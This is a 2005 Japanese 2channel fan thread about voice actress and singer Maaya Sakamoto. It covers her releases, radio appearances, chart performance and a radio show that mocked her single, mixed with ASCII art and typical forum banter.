5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

坂本真綾vol.72

1 :声の出演:名無しさん:2005/05/23(月) 03:00:09 ID:mAxJLFaR0
内容:
声優や歌はもちろん、ドラマや舞台等にも活躍の場を広げている坂本真綾について語りましょう。

前スレ
坂本真綾vol.71
http://comic5.2ch.net/test/read.cgi/voice/1115765990/

関連スレの過去ログ
http://nikopachi.tripod.com/
公式サイト『I.D.』
http://www.jvcmusic.co.jp/maaya/
ファンクラブ情報ページ
http://www.ids-maaya.com/

詳細情報・お約束等は>>2-10のどこかにあるので一度は読んでおきましょう

2 :声の出演:名無しさん:2005/05/23(月) 03:01:04 ID:mAxJLFaR0
現在の主な活動
CD/DVD
『ループ』(シングル) VICL-35791/¥1,155(TAX IN) 発売中
『少年アリス』(オリジナルアルバム) VICL-61165/¥3,045(TAX IN) 発売中
『03†(クロス)』(ショートムービー) VIBF-135/¥3,500(TAX IN) 発売中

ラジオ
BayFM『ビタミンM』(火)24:30-25:00
TFM『[ yellow tail ] MUSIC TALE』(日)17:55-18:00
http://www.tfm.co.jp/mt/
『ループ ループ マアヤ』 全国のコミュニティFM〜73局にて放送
http://absn.jp/kiroro/rupu/

TV
MBS・TBS系『ガンダムSEED DESTINY』(ルナマリア役)(土)18:00-18:00
http://www.gundam-seed-d.net/
NHK教育『ツバサ・クロニクル』(知世役)(土)18:30-18:55
http://www3.nhk.or.jp/anime/tsubasa/

OVA
『トップをねらえ2』(ラルク役)発売中
http://www.top2.jp/

ゲーム
PS2『ぼくらのかぞく』(こっこ役)発売中
http://www.playstation.jp/scej/title/bkz/

ミュージカル
『レ・ミゼレラブル』(エポニーヌ役) 大阪公演 12/8-
http://www.umegei.com/m2005/les_miserables.html

3 :声の出演:名無しさん:2005/05/23(月) 03:02:08 ID:mAxJLFaR0
レス数が900を超えたら、次のように新スレに移行します。
1.まず、適当にテンプレ案を決めます。
2.950を踏んだ人は1.で決めたテンプレ案に従って新スレを立ててください。
  (950が立てられない場合は951が立てることになります)
  (951も立てられない場合は952が(以下略)
3.ちゃんと新スレが立ったら旧スレッドに新スレッドのURLを貼ります。
4.1000まで適当に何か書きます。(1000レス目を書けた人は心の中で喜びましょう)
5.以後、書き込みは新スレの方で行います。
*スレッド容量が482KBを超えても同様に新スレに移行します。(この場合491KBの人が立てます)
*故意に上記の手順に反したものは次スレとはなりません。

4 :声の出演:名無しさん:2005/05/23(月) 03:04:20 ID:1AjUvD7/0

        出    部   こ                  __
        来    屋   の              /    \
        る    .を   ス             /  ノ┼ー  ヽ
        だ   明   レ               |  ─┴─  |
        け   る   を              ヽ  | ̄ ̄|  /
        遠   く    ご              \  ̄ ̄ /
        .く    し    覧                   ̄ ̄
        か   て    に
        ら    `   .な       /\___/ヽ      /\___/\
        ご          る      /''''''   '''''':::::::\   / ⌒   ⌒ ::: \
         覧       .時     |(●),   、(●)、.:|  | (●), 、(●)、 |  
           く        は     |   ,,ノ(、_, )ヽ、,, .::::|  |  ,,ノ(、_, )ヽ、,,   |  
        だ              |   `-=ニ=- ' .:::::::|  |   ト‐=‐ァ'   .::::|   
        さ               \  `ニニ´  .:::::/  .\  `ニニ´  .:::/
        い                `ー‐--‐‐―´.      `ー‐--‐‐―´´

5 :声の出演:名無しさん:2005/05/23(月) 03:08:20 ID:8Nr6ZRDE0






      ★死ね房立ち入り禁止★

6 :声の出演:名無しさん:2005/05/23(月) 03:09:38 ID:4WZkOfMP0
注意:以下の行為は慎みましょう。
・個人サイトの直リンク、誹謗中傷、及び荒らし依頼(httpは削る事を推奨します)
・特定の個人、及び固定ハンの誹謗中傷
・煽り、荒らしに対する過剰な反応、行動 (無視と放置が大切)
・著作権、肖像権の発生する写真、映像、音声等のデータへのリンク、またはそれを求める発言
・過度な性的妄想・下品ネタ、スレ違いネタ
・出演作品に対する批評
・その他、2chガイドライン↓で削除対象となる行為
http://www.2ch.net/guide/adv.html#saku_guide

7 :声の出演:名無しさん:2005/05/23(月) 03:13:02 ID:mAxJLFaR0
>>1-2
sage忘れちゃった、スマソ

8 :声の出演:名無しさん:2005/05/23(月) 03:38:31 ID:vA18vuuv0
>>1

>>5もテンプレ?

9 :声の出演:名無しさん:2005/05/23(月) 03:53:23 ID:iEzL4b8C0
>>8
もちろんそうでしょ。
ゆえに、>>6(ID:4WZkOfMP0)は氏ね房なので無視でおk。

10 :声の出演:名無しさん:2005/05/23(月) 04:16:49 ID:3dbiUDrt0
>>9
社会で認められないうp房としては
せめてネットでは自分勝手なことをしたいということかw

11 :.\_______ _______/ :2005/05/23(月) 04:38:10 ID:iEzL4b8C0
            ∨
    ビシッ  / ̄ ̄ ̄ ̄\
    / ̄\(  人____)
  , ┤    ト|ミ/  ー◎-◎-)
 |  \_/  ヽ    (_ _) )
 |   __( ̄ |∴ノ  3 ノ
 |    __)_ノ ヽ     ノ
 ヽ___) ノ    ))   ヽ.
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

12 :声の出演:名無しさん:2005/05/23(月) 10:09:32 ID:1Q6uQMrM0
なにはともあれ、>>1

13 :声の出演:名無しさん:2005/05/23(月) 14:10:24 ID:BhXUvRgw0
|  、_(o)_,:  _(o)_, ::|うわぁぁああぁああぁ

14 :声の出演:名無しさん:2005/05/23(月) 17:26:34 ID:q0aTyw+L0
>>6
ダウンロードは違法じゃねーよ馬鹿。

15 :声の出演:名無しさん:2005/05/23(月) 19:48:03 ID:m1OSsiKN0
こんなの見つけたから注文してみた。
http://www.sonypictures.jp/homevideo/catalog/catalogDetail_JPDVDTSDD-33676.html

16 :声の出演:名無しさん:2005/05/23(月) 20:47:45 ID:5u7Ge/cCO
オアシスの特番Inter FMでも日曜にやるって今日流れてたからどこの局でもきけんのかな…。
今日オアシスのイベントがあったような気がするが真綾行ってたりするのかね

17 :声の出演:名無しさん:2005/05/23(月) 20:52:17 ID:8dgZjqbX0
うpまだ〜?

18 :声の出演:名無しさん:2005/05/23(月) 20:54:08 ID:0rzRWrfT0
                 ,. -─‐- ._
               , '´   _zr '´  ̄ `ヽ、
              / ,. '´ ̄    、ー- ..__\
            / /     /ヽ._ノ    ` ヽ.
              l  l    /     、 \  ヽ Y7
              |  L - '´i l ト、ト、、 `ト}、.ィ、 i-iく.
         「`ヽ!._ l_,.イ l i l i ト l| ヽヽレ',.ニ | N├′
         _二ニlァヒ..l l ハ __l__ヽ  ィiト} }jノ lト、
         \_ァ'´ l  ヽハT´  `   `゙-' j ノ丁ヽ
         _/  /」  弋 ''´ ̄`    ' ,〃l リ
       _/ //  !ハ  _>,‐、  r__フ /l ハ   真綾スレをみる時は、ディスプレイから離れて
      /  /,../..__r‐- ヽ ト-/ lー r-r ´\l  ヽ  ちんぽをしまって見てね
.    //  /ゝ、   ̄`¬--{  ト.Yノ|    ヽ   ヽ
  ////  ///:(`7ーr .._      {{i-i}-l、   _/l   i、ヽ
 / 〃/  〃/-‐,/ .::{  `¬ー く.ヾソ  レ/ V }  l i}
   {l l  li::ヽ/j .:::::{ ー-- ...__r_j_,ノ__/ 人  | ソ
   ヽ |__{{:::::::Vl ::::::::ゝー-- ‐ェ‐'´:::::/ヽ-- ' //\l__
      _>‐ァ‐l :::::::::::`ー-_'/:::::::::,/_ム-- '     \
    /   /!  ヽ.:::::::_//:::::::::::::八 ̄ ̄\         }マニ、
   /    { ヽ    ̄\/:::::::::::::/ /\    \     //ニr'’


19 :声の出演:名無しさん:2005/05/23(月) 22:17:34 ID:83oNvhWTO
真綾のループ目当てでCS録画中だが香椎たんのメバエが来てちょっと得した気分。

20 :キモヲタ・マスラヲ:2005/05/23(月) 22:41:13 ID:v08MDYBL0
    / ̄ ̄ ̄ ̄\ 
   (  人____)
   |./  ー◎-◎-) 
   (6     (_ _) )  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   | .∴ ノ  3 ノ < 真綾タソ 萌え〜〜 (Fu-!Fu-!)
    ゝ       ノ   \______________

21 :声の出演:名無しさん:2005/05/23(月) 22:43:38 ID:20fNJnqLO
エルメスを坂本真綾にして
電車男をオレンジレンジのヤマトにすべきじゃないか?

22 :声の出演:名無しさん:2005/05/23(月) 22:56:11 ID:m1OSsiKN0
TOP20返り咲きなるか?
5→5→7→7→7→10→11→32→37→33→30→26→23

23 :声の出演:名無しさん:2005/05/23(月) 22:57:08 ID:Ns5gmODa0
なんでヤマト?

24 :声の出演:名無しさん:2005/05/23(月) 22:57:50 ID:Ns5gmODa0
ageちったスマソ

25 :声の出演:名無しさん:2005/05/23(月) 23:25:25 ID:HW3DuhPT0
M-ONの公式ランキング見てきたが
ネギまが無いってのがいいな、なんか勝った感じでw

26 :声の出演:名無しさん:2005/05/23(月) 23:26:58 ID:wZhdvLu20
PVないし

27 :声の出演:名無しさん:2005/05/23(月) 23:33:25 ID:B+RgZ1O40
なんで邦楽板にスレ立ってへんの?

28 :声の出演:名無しさん:2005/05/23(月) 23:34:34 ID:2Zwu0AsK0
邦楽女性ソロ板ができたから。

29 :声の出演:名無しさん:2005/05/23(月) 23:39:15 ID:wZhdvLu20
ところでこのスレに香椎由宇たんヲタって俺含め3人ぐらいいるよね
メバエDVDは明日発売です

30 :声の出演:名無しさん:2005/05/23(月) 23:44:49 ID:B+RgZ1O40
>>28
ほんとだ。ありがd

31 :声の出演:名無しさん:2005/05/23(月) 23:47:23 ID:Ns5gmODa0
>>25
勝負を挑む相手がそれってのがダメだよ…

32 :声の出演:名無しさん:2005/05/23(月) 23:52:28 ID:tTB7bIBs0
>>29
だからって語るな。
スレにいるという理由で菅野オタが語りだしたらどうするんだ。

33 :声の出演:名無しさん:2005/05/24(火) 00:09:47 ID:3L8hTsum0
香椎由宇って知らないし

34 :声の出演:名無しさん:2005/05/24(火) 00:29:07 ID:zramBI1U0
最近めっちゃスレが進むな 追いつけん

35 :声の出演:名無しさん:2005/05/24(火) 00:34:59 ID:m9MXyj/O0
前スレ見る感じろくな伸び方じゃないけどね・・・

しかしループ2週目も売れてるな
これは巣立ち成功と見て良さそうだな

36 :声の出演:名無しさん:2005/05/24(火) 00:48:29 ID:ZvH/3uBc0
このスレ見に来るようなのはおいといてループ聞いて気に入った
非オタの新規購入者はハイタッチを聞いて('A`)・・・なんじゃなかろうか

37 :声の出演:名無しさん:2005/05/24(火) 00:51:21 ID:HyU9ZwTA0
かわいいとおにゃのこに評判だよ

38 :声の出演:名無しさん:2005/05/24(火) 00:53:36 ID:nSlEn0Ox0
>>36
確かにそうだが俺の経験上c/w曲で('A`)になるのは真綾に限らず珍しいことじゃないと思う

39 :声の出演:名無しさん:2005/05/24(火) 01:01:43 ID:dPBDih6E0
むしろ菅野厨だけじゃなかろうか

40 :声の出演:名無しさん:2005/05/24(火) 01:04:14 ID:ajOGcCgY0
>>35
まだ2位じゃん!すげえ!

41 :声の出演:名無しさん:2005/05/24(火) 01:04:33 ID:ajOGcCgY0
なんだよ2位って。7位だよ…。

42 :声の出演:名無しさん:2005/05/24(火) 03:12:29 ID:uj4GJe860
>>29
来月のM-ON単独司会か

43 :声の出演:名無しさん:2005/05/24(火) 03:49:12 ID:AmRtASxR0
870 □ :以下、名無しにかわりましてVIPがお送りします 2005/05/24(火) 03:28:35 ID:fbi/k/a40 [sage]
よし書き込めるな
ハピマテと坂本真綾のループが滅茶苦茶に貶されるFMラジオWANTED
苺10のstraw1554.mp3にあります

44 :声の出演:名無しさん:2005/05/24(火) 04:17:48 ID:9XA4weT10
別に普通

45 :声の出演:名無しさん:2005/05/24(火) 04:30:12 ID:dPBDih6E0
ttp://blog.goo.ne.jp/shinpati2003/e/f10bd081f32d935063d73121a026d3e6
その音源菊地の平謝りまで入ってないじゃん

46 :声の出演:名無しさん:2005/05/24(火) 04:39:02 ID:5aIpa8Mr0
苺の10ってどうやって行くんだ?
30なら見つけたが・・・

47 :声の出演:名無しさん:2005/05/24(火) 04:51:36 ID:HyU9ZwTA0
そういや菊池ミューマガでボロクソ書かれてたな
ミュージックマガジンくるりんぱとかまた小馬鹿にした物言いなのもそのせいか

48 :声の出演:名無しさん:2005/05/24(火) 04:58:24 ID:YvLgMJUt0
>46

sn uploader3

を探してみな。

49 :声の出演:名無しさん:2005/05/24(火) 07:13:53 ID:K7YfHg/CO
周囲の冷ややかな視線を受けながらマーヤと
葡萄狩りバスツアーやボウリング大会や
バースデーパーティinファミレスとかやりたいです

50 :声の出演:名無しさん:2005/05/24(火) 07:46:11 ID:cwjFthww0
昔はその手のやってたけど今や無理っぽい
落選者がうるさいし

51 :声の出演:名無しさん:2005/05/24(火) 08:02:47 ID:OLraGiAV0
単純にオタと交流するようなイベントを真綾がやりたくないだけだろ

でもあと4,5年もしたら真綾が自主的にイベント開催するようになるだろうから安心しれ
ファンが離れ出してから、必死につなぎ止めようと空回りするのが声優の運命らしい
椎名しかり国府田しかり、真綾も例外じゃあるまいて


52 :声の出演:名無しさん:2005/05/24(火) 12:47:57 ID:TDGuf8un0
WANTED糞ワラタけどなぁ
ここにいる純粋培養の奴らには刺激が強すぎるのかも

53 :声の出演:名無しさん:2005/05/24(火) 13:07:30 ID:3dyVEvykO
なんでこの人ライブツアーやらないの?

54 :声の出演:名無しさん:2005/05/24(火) 15:32:55 ID:Q3iWmx67O
そこまで名が知られてないから、黒字になるほどの集客数は望めないんだろう。
あと、歌手業以外が忙しいから、あまりにもハードスケジュールになるためかと思う。

55 :声の出演:名無しさん:2005/05/24(火) 15:45:12 ID:4v8k3rRi0
レミゼでてて、メインキャストの仕事仲間が大物舞台俳優だったりすると
あてられて、声優という仕事(そのファン含む)にたいし劣等感みたいなものが生まれるのかもねぇ。

56 :声の出演:名無しさん:2005/05/24(火) 15:59:31 ID:5IkPElOF0
>>54
集客力はかなりある。
つかチケ取れない人が多すぎ。
なんのためのファンクラブなのかと小1時間(ry

57 :声の出演:名無しさん:2005/05/24(火) 16:33:00 ID:3dyVEvykO
>>56
だよね。
ならやらない理由は忙しいからだけ?
すなわち歌にそこまで重点を置いてないってことか

58 :声の出演:名無しさん:2005/05/24(火) 16:46:53 ID:5l4R7G1v0
夢に真綾が出てきました
白いセーター着てました
俺より頭一つ分小柄でした
ありがとう真綾

でも彼氏いるんだよね

59 :声の出演:名無しさん:2005/05/24(火) 17:02:26 ID:OLraGiAV0
集客力あるのは分かってる
だから「やらない」んじゃなくて「やりたくない」んだろって言ってんだよ
真綾ライヴは一般女ファンも来るんだろうけど、ほとんどがオタ男だろ

それとは別として、ライヴはグッズ売っても客満杯にしても儲けが少ないってのもあるかもな

60 :声の出演:名無しさん:2005/05/24(火) 17:22:33 ID:e0JZot9I0
[ラジオ] 坂本真綾 ビタミンM 2005年05月17日 第163回.mp3 21,066,395 6c8142aacbcb75b83a34eeccd1b48804


61 :声の出演:名無しさん:2005/05/24(火) 17:50:14 ID:e0JZot9I0
[ラジオ] BayFM BAY COMFORT 2005年05月12日 坂本真綾.mp3 33,496,501 f9fef191eb3b60b09c8dba0dd9846d5a


62 :声の出演:名無しさん:2005/05/24(火) 19:10:10 ID:DmX6liuo0
今更WANTEDを聞いたが
名前が声優っぽいだとかアニメの曲だからとか言うのは構わんが
ブードゥー教の音楽と被らせて流したり茶化すのはいい気がせんね

63 :声の出演:名無しさん:2005/05/24(火) 19:44:27 ID:ToN0efuD0
く〜る〜 きっとくる〜

64 :声の出演:名無しさん:2005/05/24(火) 19:51:22 ID:HyU9ZwTA0
そういう芸風

65 :声の出演:名無しさん:2005/05/24(火) 20:01:55 ID:mEBMOr4QO
っつか、名前が声優っぽいって
本名だから仕方がないだろ…。

66 :声の出演:名無しさん:2005/05/24(火) 20:11:43 ID:HyU9ZwTA0
大塚にしてもKに対してもなにかしら言ってるだろ

67 :声の出演:名無しさん:2005/05/24(火) 20:49:13 ID:DUiHmLnb0
明日25日20:00〜
NACK5のオアシス特番に真綾出るのは既出?

68 :声の出演:名無しさん:2005/05/24(火) 21:47:07 ID:+xHPEZTK0
ttp://headlines.yahoo.co.jp/hl?a=20050524-00000219-kyodo-ent

ビクターはこのことを想定していたのかな

69 :声の出演:名無しさん:2005/05/24(火) 22:06:03 ID:wEBrBwie0
>>68
金城ヲタには結婚で離れるようなヲタはいないだろ

70 :声の出演:名無しさん:2005/05/24(火) 22:07:42 ID:ms5CxS1GO
>>67
オアシス祭にはジョージウィリアムスとコンビで出ます
今24日の夜10時からノースウェーブでやっています。

71 :声の出演:名無しさん:2005/05/24(火) 22:09:26 ID:H9L0AsXA0
bayFM聞けない者ですが、誰かOASISの番組聞いてないの?
うp頼む・・・

72 :声の出演:名無しさん:2005/05/24(火) 22:10:36 ID:ms5CxS1GO
>>72
イソターFMは?

73 :声の出演:名無しさん:2005/05/24(火) 22:13:52 ID:H9L0AsXA0
>>72
全部同じ内容なの?

74 :声の出演:名無しさん:2005/05/24(火) 22:16:24 ID:nzeEgZsO0
昔の彼氏の影響か・・<オアシス好き
今日はなんとも口調が滑らかだ。

75 :声の出演:名無しさん:2005/05/24(火) 22:16:36 ID:ms5CxS1GO
>>73
イソターはどうだろう…
NACK5とBAYとノースウェーブは同じだが

76 :声の出演:名無しさん:2005/05/24(火) 22:20:54 ID:nzeEgZsO0
>>75
NACKは別番組やってないか?
FM YOKOHAMAで聴いているのだが。

77 :声の出演:名無しさん:2005/05/24(火) 22:24:11 ID:ms5CxS1GO
>>76
うーむ、時間が各局バラバラみたいだね…
俺はノースウェーブしか聴けないから確認出来ない…

78 :声の出演:名無しさん:2005/05/24(火) 22:24:58 ID:H9L0AsXA0
>>75
サンクス!
NACK5は雑音がすごいですが何とか聞けそうです。
録音してる人いないですよね・・・

79 :声の出演:名無しさん:2005/05/24(火) 22:32:19 ID:Vl8E/7YR0
帰れ

80 :声の出演:名無しさん:2005/05/24(火) 22:33:22 ID:jERMreeI0
79↓↑『声の出演:名無しさん』 sage
帰れ

81 :声の出演:名無しさん:2005/05/24(火) 22:40:13 ID:nzeEgZsO0
DJ:ジョージ・ウィリアムス、坂本真綾
FM SPECIAL「オアシス祭」
<放送局・放送日>
FM大阪 5月22日 20:00−20:55
Bay FM 5月24日 22:00−23:00
FM YOKOHAMA 5月24日 22:00−23:00
NORTH WAVE 5月24日 22:00−23:00
NACK5 5月25日 20:00−21:00
ZIP−FM 5月25日 22:15−23:15
CROSS FM 5月26日 22:00−23:00
INTER-FM 5月29日 10:00−11:00

82 :声の出演:名無しさん:2005/05/24(火) 22:40:38 ID:ToN0efuD0
都心なのにマンションの立地条件が最悪で聞けない オワットル

83 :声の出演:名無しさん:2005/05/24(火) 22:43:31 ID:ZvH/3uBc0
>>82
つ【車】

84 :声の出演:名無しさん:2005/05/24(火) 22:48:10 ID:5uZB2YEi0
批判した菊池成孔ってLUCYでSAX担当してるのね。

85 :声の出演:名無しさん:2005/05/24(火) 22:48:43 ID:wEBrBwie0
>>84
な、なんだってー

86 :声の出演:名無しさん:2005/05/24(火) 22:58:57 ID:lc2e8kC30
もしかしてsony musicに遺跡とか?

87 :声の出演:名無しさん:2005/05/24(火) 23:09:03 ID:AF2P2jls0
FM YOKOHAMAでもやってたのか…逃した…_no
久々に横浜発で真綾の声が聴けたのに…

88 :声の出演:名無しさん:2005/05/24(火) 23:11:12 ID:jjym8ftA0
>>84-85
少し上のレスも見ないのか…
そんなので煽りって

89 :声の出演:名無しさん:2005/05/24(火) 23:23:39 ID:4v8k3rRi0
この年頃の女の子は結構Oasis好きなこいてるぞい。
彼氏影響どうこうなく

90 :声の出演:名無しさん:2005/05/24(火) 23:37:29 ID:dPBDih6E0
菅野厨は多くてもここには菊地ヲタは1人ぐらいしかいないのか?
山本麻里安とかやってたのにね
インリンとの厨っぽいいざこざも信者がすぐに火消しに走ってたし取り巻き多いからなこいつ

91 :声の出演:名無しさん:2005/05/24(火) 23:42:49 ID:jjym8ftA0
こんなスレに深く音楽やら声優を趣味にしてる奴いないだろう。
俺も人のこと言えないけど

92 :声の出演:名無しさん:2005/05/24(火) 23:46:03 ID:j+1ncVv90
>>インリンとの厨っぽいいざこざ

そんなことあったんだ。
菊池成孔って菅野のサントラにも何枚か参加してたね。
WANTEDの時も事務所の社長から、速攻、ツッコミのFAXもらって
「坂本さん。ごめんなさい」
って平謝りする羽目になってるし、けっこうウカツな人だな。

93 :声の出演:名無しさん:2005/05/24(火) 23:50:12 ID:jjym8ftA0
菅野とは仕事しましたねって言ってたじゃん。
ま、鵜呑みにしたいのならすれば良いと思うけど。

94 :声の出演:名無しさん:2005/05/24(火) 23:52:21 ID:pFeOKcqjO
>>90
菊地信者乙。
WANTEDスレやネギまスレにめ現れてご苦労なこった

95 :声の出演:名無しさん:2005/05/24(火) 23:54:34 ID:Ao5476o70
【新番組】WANTED! 【スタートおめ】
http://tv6.2ch.net/test/read.cgi/am/1112689535/
魔法先生ネギま!のCD 12枚目
http://music4.2ch.net/test/read.cgi/asong/1116735560/

儲の皆様、よろしく

96 :声の出演:名無しさん:2005/05/25(水) 00:02:32 ID:dPBDih6E0
ん?俺は嫌いだからたまにオチしてるぐらいだよ
信者云々はこいつのサイトの日記でも読めばわかるんじゃないかと。結構気持ち悪いです

97 :声の出演:名無しさん:2005/05/25(水) 00:05:16 ID:BYan9w520
何か殺伐としてるねー。
たかが深夜のFMラジオごときに熱くなれるお前ら最高だよ。

真綾の殺伐さには勝てないけどね

98 :声の出演:名無しさん:2005/05/25(水) 00:09:17 ID:01n6VZwN0
ID:dPBDih6E0 と2名ほど

いい年こいたオッサン乙
いつまで真綾追っかけてるんですか?(爆笑wwwwwwwww

99 :声の出演:名無しさん:2005/05/25(水) 00:12:33 ID:nNWmBerz0
>>95
なるほど。そこに貼られたからお客さんが来てたのか
菊地に関しては、ここで我々が軽率なことを口にするわけにはいかないんだ。
菊地信者という人たちが存在していて、彼らは偏執的に菊地周辺の情報を集めるわけだ。だから、うっかりしたことは口にできないんだったよ(笑)

100 :声の出演:名無しさん:2005/05/25(水) 00:15:02 ID:dJp/zAcy0
菊地って言う人はそんな裏側の人間なのかよ。
音楽業界も結構怖いんだな。元締めがカスラックなだけはあるわ。

101 :声の出演:名無しさん:2005/05/25(水) 00:17:39 ID:F/6JYKJg0
あっちのスレ、マメなチクリとか偏執的でイタい。
種類が違うだけで分類キモヲタばかりじゃんw

102 :声の出演:名無しさん:2005/05/25(水) 00:17:57 ID:VWpOutk70
ネギまとWANTED!とここを敵対させようとする工作員がいる事に気付いてるの?
それ分かっててレス返してるんなら何も言わないけども。

103 :声の出演:名無しさん:2005/05/25(水) 00:20:21 ID:UGhZBEjI0
やっぱり、Mステみたいな歌番組に出ないと、なにをやっても無駄な気がする。


104 :声の出演:名無しさん:2005/05/25(水) 00:20:25 ID:nNWmBerz0
こいつのこういうスタンスが一部の偏った傾向を持つ人たちの間で大変ウケていて神格化されていると認識してもらえばいいかと
カリスマです
信者にはモーヲタアニヲタサブカルヲタ等が多数いらっしゃいます

105 :声の出演:名無しさん:2005/05/25(水) 00:26:47 ID:de79rlfk0
色々ネットで見てたらインリン騒動とかもあって
キャッシュみてたら菊地信者は声優オタ以上の崇拝っぷりなんで
ヘタに噛み付かないほうがいいかと
サックスのすごい人らしいし

106 :声の出演:名無しさん:2005/05/25(水) 00:31:16 ID:F/6JYKJg0
いや、ここはのっかって遊んでおかないと損な気がする。

107 :声の出演:名無しさん:2005/05/25(水) 00:33:19 ID:VWpOutk70
お、遊ぶのか。
おまいら面白いな、頑張れよ

108 :声の出演:名無しさん:2005/05/25(水) 00:33:32 ID:dJp/zAcy0
そういうことか。
でも、このスレに筋金入りの奴らが乗り込んでくるのかな

109 :声の出演:名無しさん:2005/05/25(水) 00:33:41 ID:pKLXi61j0
スレ違いキリがない

110 :声の出演:名無しさん:2005/05/25(水) 00:39:11 ID:de79rlfk0
バトルはネギまオタにでもやらせとけばいいんじゃないの
田村ゆかりや堀江ゆいあたりならまだしも
真綾オタじゃ信者の痛さでも弾の数でも他の2派に勝ち目ないよ

明日の放送で何か言ってたらまた特攻されるぞ

111 :声の出演:名無しさん:2005/05/25(水) 00:47:00 ID:5A++LqNkO
ループしてること。中傷

112 :声の出演:名無しさん:2005/05/25(水) 00:48:38 ID:5A++LqNkO
ループしてること。てめーの番組上での中傷発言が忘れられません。

113 :声の出演:名無しさん:2005/05/25(水) 01:05:04 ID:f58C/NMPO
つまらん。

114 :\___ ______/:2005/05/25(水) 01:12:47 ID:01n6VZwN0
            ∨
    ビシッ  / ̄ ̄ ̄ ̄\
    / ̄\(  人____)
  , ┤    ト|ミ/  ー◎-◎-)
 |  \_/  ヽ    (_ _) )
 |   __( ̄ |∴ノ  3 ノ
 |    __)_ノ ヽ     ノ
 ヽ___) ノ    ))   ヽ.

115 :声の出演:名無しさん:2005/05/25(水) 01:21:38 ID:nNWmBerz0
それIDポップアップすると笑える

116 :声の出演:名無しさん:2005/05/25(水) 01:47:42 ID:RAEnTv4v0
ハゲワラ

117 :声の出演:名無しさん:2005/05/25(水) 02:10:45 ID:Zwm8l20tO
やたらスレ違いの話をしたがるおっさんは帰ってください気持ち悪い

真綾スレの大半はそういうの興味無いので

118 :声の出演:名無しさん:2005/05/25(水) 03:03:26 ID:zZ7+ivyF0
アルバムは秋に出るのか。楽しみだ。

119 :声の出演:名無しさん:2005/05/25(水) 04:14:12 ID:YklvC62I0
楽しみのような怖いような

120 :声の出演:名無しさん:2005/05/25(水) 04:54:15 ID:M28vlIAd0
真綾さんの「ループ」って菅野さんが創ってないみたいだけど何か特別な
理由があったんですか?なんか久しぶりに声優っぽい(悪口ではないです)歌
聞いたので驚いてます。できればアルバムではまた菅野さんに創って欲しいな。

121 :声の出演:名無しさん:2005/05/25(水) 05:20:47 ID:iScURfpx0
FM J-Wave 森山直太朗 22:57

ランキングを紹介し、ネギマのCDが登場

P「これこれ、ジャケット」
森山「ああ、萌えー アキバ系のやつだ、あのー これね 無くなってほしいですね」
P「なんてこというの。こういう人が日本の経済支えてるのよ、アキバは日本で有名なのよ」
森山「声優さんかな? これ」
P「きれいな方ばっかりですからね、声優さんは」
森山「まぁ、ブームってあると思うんだけど。がんばって日本の経済支えてください!」


122 :声の出演:名無しさん:2005/05/25(水) 06:06:33 ID:oA6l1rjI0
Wantedから一部抜粋

ブードゥーと一緒に流しながら
「これだけだとあれだかれねwwwwww」
「呪いの曲をねwwww」

名前を出して
「AVっぽいねwwwwww」
「頭のこのアンテナから携帯の電波うけとるのかなwwwwwwww」
「エロアートわかってやってるねwwww」
「このコマで相手の頭を割って殺すんですねwwwww」
「(名前呼びながら続けて)インリンオブジョイトイwwwwww」
「早稲田中等部2-Awwwwwww」

教えて欲しいぞマスターかける前に
「じゃぁかけましょうか」
「嫌ですけどねwwwwwwww」

「別にかわいくないよねwwww」

意図的に速度落として男っぽいキモイ声にして「ぎゃはははwwwww」

坂本真綾の名前みて
「なんか嫌な予感だねwwwwwww」


123 :声の出演:名無しさん:2005/05/25(水) 06:28:17 ID:m+wt4QAe0
俺このラジオ聴いてマジ笑い転げたけどなぁ
パーソナリティセンスあるなと思ったww
あんま悪意は感じなかったが>>122みたいに書くとボロクソ言ってるように見えるなw
茶々丸の耳がアンテナとかコマ持ってるとか腹が痛かったよ


まぁ俺の夕映をAV女優みたいな名前呼ばわりは許せんけどな

124 :声の出演:名無しさん:2005/05/25(水) 06:28:17 ID:oNTnSEZq0
今、芸能ニュースでレミゼやってたけど真綾と関係ない公演だたよ
まぁそんなもんだよな、と改めてオモタ

125 :声の出演:名無しさん:2005/05/25(水) 06:39:10 ID:HFPwK9jN0
>>121-122
禿しくスレ違い。つか板違いだ。(・∀・)カエレ!!

126 :声の出演:名無しさん:2005/05/25(水) 06:41:29 ID:m+wt4QAe0
あ、付け加え忘れ
直太朗は氏んでよし
亡くなってほしいですねー

127 :声の出演:名無しさん:2005/05/25(水) 07:35:05 ID:H5YIjnBQ0
いい加減「まーや」あるいは「みつばちまーや」と呼ぶの飽きた
新しい呼び方を考えなきゃいけない時期に来たと思う
そこで俺様から提案

提案1:さかもち
提案2:レミゼ野郎
提案3:菅野じゃない奴(NHK「恐竜家族」のベイビー、「ママじゃない奴!」のノリで)
提案4:25歳
提案5:三十路まであと五つの女
提案6:麦わらの真綾
提案7:部屋とYシャツと真綾
提案8:腐ったみかん
提案9:ロドリゲス

128 :声の出演:名無しさん:2005/05/25(水) 07:49:15 ID:jVTcP1PN0
>>120
>何か特別な理由があったんですか?
あったよ。

>なんか久しぶりに声優っぽい(悪口ではないです)歌聞いたので驚いてます。
お前は声優以外の歌も聴くようにしろ。

>できればアルバムではまた菅野さんに創って欲しいな。
つくらねーよ。

129 :声の出演:名無しさん:2005/05/25(水) 07:53:32 ID:ez1bQyPmO
>>124
昨日からレミゼは「お祭り」公演になったからめざましでやったんじゃない?
真綾が出てた通常公演とはある意味別物。
3月初日の翌日は同じようにめざましでとりあげられて、
真綾もちらっと映ってたような。

130 :声の出演:名無しさん:2005/05/25(水) 08:32:37 ID:oNTnSEZq0
>>129
そうそう。なんか昔の公演のエポの人とか出てた
今の公演に出てる人も出てたけど常連さんだけみたいだった
3月初日のは見逃したんだよね(-_-)  

131 :声の出演:名無しさん:2005/05/25(水) 12:12:40 ID:11thnwEvO
加賀ジャベとかめちゃめちゃ見たいな。

132 :声の出演:名無しさん:2005/05/25(水) 12:24:52 ID:EgHuZLGc0
ちょwwwまwwww
ループのPVwwww乳が全くねぇwwwwww
まな板じゃないかwwwwwwwwwwww

133 :声の出演:名無しさん:2005/05/25(水) 12:27:21 ID:4qw4ggrR0
この胸が 平らなら ふたり出会えてなかった

134 :声の出演:名無しさん:2005/05/25(水) 12:59:12 ID:iJwPwMiXO
